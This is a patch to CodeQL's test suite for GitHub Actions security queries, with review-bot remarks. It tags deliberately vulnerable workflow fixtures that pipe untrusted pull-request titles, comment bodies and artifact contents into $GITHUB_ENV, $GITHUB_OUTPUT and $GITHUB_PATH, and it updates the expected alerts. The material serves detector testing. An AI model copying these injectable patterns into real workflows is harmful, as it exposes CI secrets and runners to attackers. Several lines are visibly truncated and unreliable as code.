-1,2 +1,2 @@ -Models/ReusableWorkflowsSummaries.ql - +query: Models/ReusableWorkflowsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml index 787fb9f588b..4780a1529f8 100644 
--- a/actions/ql/test/query-tests/Models/action1/action.yml +++ b/actions/ql/test/query-tests/Models/action1/action.yml @@ -1,17 +1,17 @@ name: 'Hello World' description: 'Greet someone' inputs: - who-to-greet: # id of input + who-to-greet: # id of input # $ Source[actions/composite-action-sinks] Source[actions/composite-action-summaries] description: 'Who to greet' required: true default: 'World' outputs: reflected: description: "Reflected input" - value: ${{ steps.reflector.outputs.reflected }} + value: ${{ steps.reflector.outputs.reflected }} # $ Alert[actions/composite-action-sources] Alert[actions/composite-action-summaries] tainted: description: "Reflected input" - value: ${{ steps.source.outputs.tainted}} + value: ${{ steps.source.outputs.tainted}} # $ Alert[actions/composite-action-sources] runs: using: "composite" @@ -29,23 +29,23 @@ runs: find: 'foo' replace: '' - id: sink - run: echo ${{ steps.replace.outputs.value }} + run: echo ${{ steps.replace.outputs.value }} # $ Alert[actions/composite-action-sinks] shell: bash - name: Vulnerable Set Greeting - run: echo "Hello ${{ inputs.who-to-greet }}." + run: echo "Hello ${{ inputs.who-to-greet }}." # $ Alert[actions/composite-action-sinks] shell: bash - id: reflector run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT shell: bash env: - INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} # $ Source[actions/composite-action-sources] - id: changed-files uses: tj-actions/changed-files@v40 - - id: source + - id: source # $ Source[actions/composite-action-sources] run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT shell: bash env: - TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} # $ Source[actions/composite-action-sources] 
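Review bot: The `# $ Source[actions/composite-action-sources]` on `- id: source` reads as if the `source` run step were the modeled source, but per `CompositeActionsSources.expected` the source node is `42:7:44:4 | Uses Step: changed-files`, i.e. the `tj-actions/changed-files@v40` step above, whose location ends in the indentation of line 44 where the next list item begins. The tag lands there apparently because the framework matches it against the line on which the location ends; the same step in `reusable_workflow.yml`, with nothing following it, gets its tag on the `uses:` line itself (`31:9:33:43`). A plain comment on the `uses:` line would make this explicit without being parsed as an expectation, e.g. `uses: tj-actions/changed-files@v40 # modeled source; its Source tag is on the next line, where this step's location ends`. That adds no line, so the .expected locations should be unaffected, but regenerate to confirm.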
diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml index 01036f71148..73368388c9f 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml @@ -6,11 +6,11 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT # $ Alert - id: clob2 run: | echo ${{ steps.clob1.outputs.OUTPUT_1 }} @@ -32,8 +32,8 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$(> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index 614de61b0cb..0e57bee8ac9 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -6,18 +6,18 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo $BODY - echo "::set-output name=OUTPUT::SAFE" + echo "::set-output name=OUTPUT::SAFE" # $ Alert - id: clob2 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" - echo $BODY + echo $BODY # $ Alert - id: clob3 run: | echo ${{ steps.clob1.outputs.OUTPUT }} 
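Review bot: In step `clob1` the `# $ Alert` lands on `echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT` because that is the last line of the `run: |` block, while the alert location in `OutputClobberingHigh.expected` is the whole script (`output1.yml:10:14:13:50`), not that single command; the tag is positional, not a marker of the offending line, which is why in `output2.yml` the same tag ends up on the harmless `::set-output name=OUTPUT::SAFE` line of its `clob1`. The end column `13:50` appears to be exactly the width of the command without the appended tag, which suggests the `# $ Alert` text is not part of the extracted script value; I cannot confirm that from here, and it matters because inside a literal block the `#` is script text rather than a YAML comment. A short YAML comment before the step, e.g. `# The Alert tag goes on the block's last line: the alert spans the entire run script`, would document the convention; as it adds a line, regenerate the .expected afterwards.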
@@ -38,25 +38,25 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. 
| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | 
@@ -22,12 +31,3 @@ nodes | .github/workflows/output2.yml:53:14:56:19 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | | .github/workflows/output2.yml:58:14:62:48 | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | subpaths -#select -| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | -| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | -| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | -| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_ENV + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml index e4845a6f2f1..0a19c76c769 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml 
@@ -12,14 +12,14 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" cat foo >> "$GITHUB_ENV" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml index 67209267b5c..c157d791f39 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -12,7 +12,7 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - run: | @@ -20,7 +20,7 @@ jobs: echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml index d22f09c03bd..c071d54236d 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml 
@@ -10,23 +10,23 @@ jobs: - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $PATHINJ >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $PATHINJ >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo ${PATHINJ} >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo ${PATHINJ} >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name path: foo - - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] Source[actions/envpath-injection/critical] - env: ACTIONS_ALLOW_UNSECURE_COMMANDS: true - PATHINJ: ${{ github.event.pull_request.title }} - run: echo "::add-path::$PATHINJ" + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo "::add-path::$PATHINJ" # $ Alert[actions/envpath-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml index f43a12cb42a..0811e61cfc6 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml 
@@ -23,6 +23,6 @@ jobs: ref: ${{steps.decide-ref.outputs.ref}} path: "foo" - - name: Read Java Config - run: cat foo/.github/java-config.env >> $GITHUB_ENV + - name: Read Java Config # $ Source[actions/envvar-injection/critical] + run: cat foo/.github/java-config.env >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 5edd526d820..58e0f2edf9c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -18,11 +18,11 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml index 3a0c4cc91b8..097e3a09a11 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -43,14 +43,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Download pre-release report" uses: dawidd6/action-download-artifact@v2 
@@ -58,14 +58,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: prerelease-report.md - - name: "Put pre-release report on the environment" + - name: "Put pre-release report on the environment" # $ Source[actions/envvar-injection/critical] id: prerelease_report run: | { echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Comment on PR with Wrangler link" uses: marocchino/sticky-pull-request-comment@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml index 78d288fb982..278cea70f19 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -17,7 +17,7 @@ jobs: - name: Get commit message run: | COMMIT_MESSAGE=$(git log --format=%s) - echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: Get commit message run: | - echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml index 93854c5e889..5b9bd4e278c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml 
@@ -12,7 +12,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" test2: runs-on: ubuntu-latest @@ -23,7 +23,7 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml index 89ecd8c0ec3..85d6109cd49 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -9,7 +9,7 @@ jobs: steps: - id: title run: | - echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test2: runs-on: ubuntu-latest @@ -17,7 +17,7 @@ jobs: - id: title run: | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) - echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test3: runs-on: ubuntu-latest diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml index efcfda0e4c7..87a02ca5a1d 100644 
--- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml @@ -12,12 +12,12 @@ jobs: with: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr_metadata + - run: | # $ Source[actions/envvar-injection/critical] + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV - - run: | - # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # NOT VULNERABLE echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index c902b7e61bd..de66e4cf253 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -38,6 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - - run: | + - run: | # $ Source[actions/envvar-injection/critical] unzip pr.zip - echo "pr_number=$(cat NR)" >> $GITHUB_ENV + echo "pr_number=$(cat NR)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index f76454c6088..5059ee9d0da 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml 
@@ -17,7 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - run: | + - run: | # $ Source[actions/envvar-injection/critical] echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV - echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 7b30ec8b7e4..f4c6ebcb5b3 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
@@ -8,43 +8,43 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PR_TITLE<> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV - echo "EOF" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" echo "$TITLE" >> "${GITHUB_ENV}" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | cat <<-EOF >> 
"$GITHUB_ENV" FOO=$TITLE - EOF + EOF # $ Alert[actions/envvar-injection/critical] - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | @@ -52,12 +52,12 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.head_ref }} - - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TARGET_BRANCH: ${{ github.event.pull_request.title }} - - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + TARGET_BRANCH: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] - env: TITLE: |- ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml index cfc5e6ef1fa..cdcc49bde91 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -27,10 +27,10 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' + - name: 'Unzip code coverage' # $ Source[actions/envvar-injection/critical] run: unzip oc-code-coverage.zip -d coverage - name: set env vars run: | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] 
